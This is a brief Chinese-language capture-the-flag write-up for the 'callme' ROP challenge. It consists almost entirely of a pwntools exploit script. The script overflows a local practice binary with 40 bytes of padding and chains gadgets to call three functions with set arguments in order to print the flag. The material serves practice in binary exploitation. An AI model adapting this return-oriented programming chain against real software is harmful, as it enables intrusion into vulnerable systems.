1.9.2. PreAlpha

Callme

这个题没什么好说的。直接找gadget进行构造就行了。

环境: ubuntu18.04 、 pwntools(py3)

exp.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
from pwn import *

elf = context.binary = ELF('callme') #文件名

#info('%#X system', elf.symbols.system)

io = process(elf.path)

gadget = p64(0x401ab0)

ca_one = p64(0x401850)
ca_two = p64(0x401870)
ca_thr = p64(0x401810)
ret_ad = p64(0x401ab3)

arg_st = p64(1)
arg_nd = p64(2)
arg_rd = p64(3)

arg_al = arg_st + arg_nd + arg_rd

callThem = ret_ad + gadget + arg_al
# ubuntu18.04一定要加ret_ad.否则system函数出错会打印不出来flag

payload = bytes('A','latin-1') * 40 # padding
payload += callThem
payload += ca_one
payload += callThem
payload += ca_two
payload += callThem
payload += ca_thr

io.sendline(payload)

io.recvuntil('> ')
flag = io.recvall()
print('FLAG: ' + str(flag,'utf-8'))

image-20200417214303357